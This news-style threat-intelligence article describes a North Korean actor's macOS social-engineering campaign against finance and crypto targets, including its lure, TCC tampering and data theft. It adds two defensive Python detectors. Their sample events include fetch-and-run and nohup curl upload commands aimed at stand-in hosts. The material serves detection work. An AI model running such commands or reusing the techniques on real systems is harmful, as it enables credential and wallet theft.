Process tree showing cascading execution from Script Editor | Image: Microsoft Threat Intelligence
In a sophisticated shift away from traditional software exploitation, the North Korean state-sponsored threat actor Sapphire Sleet has been observed targeting the finance and cryptocurrency sectors using a multi-stage, macOS-focused social engineering campaign. By persuading users to manually execute malicious files, the actor effectively operates outside of macOS’s built-in security boundaries, including Gatekeeper, notarization checks, and Transparency, Consent, and Control (TCC) protections.
According to a detailed analysis from Microsoft Threat Intelligence, this activity demonstrates how “threat actors continue to rely on user interaction and trusted system utilities to bypass macOS platform security protections, rather than exploiting traditional software vulnerabilities”.
The campaign begins with a well-documented social engineering playbook. Using fake recruiter profiles on professional networking platforms, the actors lure targets into a “technical interview” and direct them to download a file named Zoom SDK Update.scpt.
This file is a compiled AppleScript designed to open in the trusted first-party Script Editor app. To maintain the illusion of a legitimate update, the script includes a large decoy comment block and inserts thousands of blank lines to hide its malicious logic from view. It even launches a legitimate softwareupdate command with invalid parameters to reinforce its disguise.
Once executed, the initial script triggers a “cascading chain of curl commands”. This multi-stage process dynamically fetches and executes increasingly complex AppleScript payloads, using different user-agent strings (such as mac-cur1 through mac-cur5) as campaign tracking identifiers. The primary components of the attack include:
- com.apple.cli: A host monitoring binary that performs real-time reconnaissance of running processes and hardware details.
- services: The primary backdoor and persistence installer, which establishes a launch daemon to ensure the malware survives system reboots.
- systemupdate.app: A malicious application that presents a visually indistinguishable macOS password dialog to steal the user’s login credentials.
One of the most remarkable aspects of Sapphire Sleet’s campaign is the silent manipulation of the TCC (Transparency, Consent, and Control) database. To access sensitive data without triggering user prompts, the malware directs Finder—which has Full Disk Access by default—to rename the protected TCC folder.
Once the database is exposed, the actor uses sqlite3 to inject new permissions. As the report highlights, “Sapphire Sleet achieves a highly reliable infection chain that lowers operational friction and increases the likelihood of successful compromise”.
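One defensive check that follows directly from this: audit the per-user TCC database for permission rows that were added or changed after a known-good baseline, or that grant sensitive services to clients you do not recognise. The following is an added example, not code from Microsoft or the report. The `access` table it builds in memory is a constructed, simplified subset of the real TCC.db schema, the bundle identifiers and timestamps are constructed (the `com.example.systemupdate` identifier stands in for the malicious app, whose real bundle id is not given), and an audit of a live host assumes the auditing tool itself has Full Disk Access to read the database.

```python
import os
import sqlite3

# Services whose grants matter most for the behaviour described above.
SENSITIVE = {
    "kTCCServiceSystemPolicyAllFiles",        # Full Disk Access
    "kTCCServiceAccessibility",
    "kTCCServiceAppleEvents",                 # automation of other apps
    "kTCCServiceSystemPolicyDocumentsFolder",
}
ALLOWED = 2   # auth_value meaning "allowed" in TCC.db

# Constructed reference time and the clients an administrator expects to hold grants.
BASE = 1_700_000_000
EXPECTED = {"kTCCServiceSystemPolicyAllFiles": {"com.apple.Terminal"}}


def tcc_db_path(home):
    """Location of the per-user TCC database; the folder going missing is itself a red flag."""
    return os.path.join(home, "Library", "Application Support", "com.apple.TCC", "TCC.db")


def build_sample_db():
    """Constructed in-memory stand-in for TCC.db using a subset of the real access table's columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE access (service TEXT, client TEXT, client_type INTEGER, "
        "auth_value INTEGER, auth_reason INTEGER, last_modified INTEGER)"
    )
    # client_type 0 = bundle identifier, 1 = absolute path (as in the real table)
    rows = [
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, BASE - 30 * 86400),  # user-granted weeks ago
        ("kTCCServiceSystemPolicyAllFiles", "/usr/bin/sqlite3", 1, 2, 2, BASE - 60),            # constructed: added a minute ago
        ("kTCCServiceAppleEvents", "com.example.systemupdate", 0, 2, 2, BASE - 60),             # constructed: added a minute ago
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 2, BASE - 90 * 86400),                       # ordinary, old grant
    ]
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", rows)
    return conn


def audit(conn, baseline, expected):
    """Flag allowed grants changed after `baseline` or held by unexpected clients for sensitive services."""
    findings = []
    query = "SELECT service, client, client_type, auth_value, last_modified FROM access"
    for service, client, client_type, auth_value, last_modified in conn.execute(query):
        if auth_value != ALLOWED:
            continue
        reasons = []
        if last_modified > baseline:
            reasons.append("modified_after_baseline")
        if service in SENSITIVE and client not in expected.get(service, set()):
            reasons.append("unexpected_client")
        if reasons:
            findings.append({"service": service, "client": client,
                             "client_type": client_type, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # On a real host, open tcc_db_path(os.path.expanduser("~")) instead of the sample database.
    for finding in audit(build_sample_db(), BASE - 3600, EXPECTED):
        print(finding)
```

The baseline timestamp should come from a snapshot taken when the machine was known to be clean; a grant whose `last_modified` is newer than every prompt the user remembers answering is exactly what a silent sqlite3 insert looks like.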
After securing persistence and bypassing system protections, the actor deploys a 575-line AppleScript to systematically harvest seven categories of sensitive data, among them the following. Every upload is executed using nohup, ensuring that the exfiltration continues even if the user closes their session.
- Cryptocurrency Wallets: Full application directories for Ledger Live and Exodus, along with browser extensions.
- Messaging: Complete Telegram Desktop session data, allowing the actor to recreate sessions on other systems without reauthentication.
- System Credentials: The user’s sign-in keychain and browser-saved passwords.
- Operational History: SSH keys and shell history to enable potential lateral movement within an organization.
- Personal Data: Apple Notes databases, which often contain sensitive meeting notes or infrastructure details.
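To turn the chain described in this article into detection logic, this added example (not code from Microsoft or the report) reconstructs a process tree from constructed endpoint-sensor events and flags the behaviours the report describes: a shell spawned by Script Editor or osascript, curl runs carrying the mac-curN tracking user agents, the decoy softwareupdate invocation, sqlite3 touching the TCC database, and the nohup-wrapped uploads used for exfiltration. The event record format, the `.invalid` hostnames, the victim path and all command lines are assumptions; the benign Terminal-launched curl at the end shows the rules do not fire on ordinary use.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-start record from an endpoint sensor (field names are assumptions)."""
    pid: int
    ppid: int
    name: str      # short process name as reported by the sensor
    cmdline: str   # full command line


SHELLS = {"sh", "bash", "zsh"}
SCRIPT_HOSTS = {"Script Editor", "osascript"}   # AppleScript execution hosts
UA_RE = re.compile(r"(?:-A|--user-agent)[ =]['\"]?(mac-cur\d+)")   # tracking user agents from the report
TCC_RE = re.compile(r"com\.apple\.TCC|TCC\.db")
UPLOAD_RE = re.compile(r"\s(?:-F|--form|-T|--upload-file|-d|--data)\s")


def lineage(by_pid, pid):
    """Return the chain of process names from pid up to the root, nearest first (cycle-safe)."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return names


def analyze(events):
    """Return (pid, rule) findings for behaviours matching the described chain."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        anc = lineage(by_pid, e.ppid)
        scripted = any(a in SCRIPT_HOSTS for a in anc)   # any AppleScript host in the ancestry
        parent = by_pid.get(e.ppid)
        if e.name in SHELLS and anc and anc[0] in SCRIPT_HOSTS:
            findings.append((e.pid, "shell_from_script_host"))
        if e.name == "curl":
            m = UA_RE.search(e.cmdline)
            if m:
                findings.append((e.pid, "curl_tracking_ua:" + m.group(1)))
            if scripted:
                findings.append((e.pid, "curl_from_script_host"))
            # nohup shows up in the wrapping shell's command line, the upload flags in curl's own
            if scripted and parent and "nohup" in parent.cmdline and UPLOAD_RE.search(e.cmdline):
                findings.append((e.pid, "nohup_upload"))
        if e.name == "softwareupdate" and scripted:
            findings.append((e.pid, "decoy_softwareupdate"))
        if e.name == "sqlite3" and TCC_RE.search(e.cmdline):
            findings.append((e.pid, "sqlite3_on_tcc_db"))
    return findings


def demo_events():
    """Constructed events modelled on the report's chain, plus one benign curl from Terminal."""
    return [
        ProcEvent(1, 0, "launchd", "/sbin/launchd"),
        ProcEvent(200, 1, "Script Editor",
                  '/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor "Zoom SDK Update.scpt"'),
        ProcEvent(201, 200, "sh", "sh -c curl -A mac-cur1 https://stage.example.invalid/s1 | osascript"),
        ProcEvent(202, 201, "curl", "curl -A mac-cur1 https://stage.example.invalid/s1"),
        ProcEvent(203, 201, "osascript", "osascript"),
        ProcEvent(204, 200, "sh", "sh -c softwareupdate --install --bogus-option"),
        ProcEvent(205, 204, "softwareupdate", "softwareupdate --install --bogus-option"),
        ProcEvent(300, 203, "sh", 'sh -c sqlite3 "/Users/victim/Library/Application Support/com.apple.TCC/TCC.db"'),
        ProcEvent(301, 300, "sqlite3", "sqlite3 /Users/victim/Library/Application Support/com.apple.TCC/TCC.db"),
        ProcEvent(400, 203, "sh", "sh -c nohup curl -A mac-cur5 -F data=@/tmp/out.zip https://upload.example.invalid/u &"),
        ProcEvent(401, 400, "curl", "curl -A mac-cur5 -F data=@/tmp/out.zip https://upload.example.invalid/u"),
        ProcEvent(500, 1, "Terminal", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"),
        ProcEvent(501, 500, "zsh", "-zsh"),
        ProcEvent(502, 501, "curl", "curl -sS https://example.com/"),
    ]


if __name__ == "__main__":
    for pid, rule in analyze(demo_events()):
        print(pid, rule)
```

The user-agent rule is the most brittle, since a tracking string is trivial to change; the lineage rules (a shell or curl whose ancestry includes Script Editor or osascript, and sqlite3 opening TCC.db at all) are the ones worth keeping as standing detections.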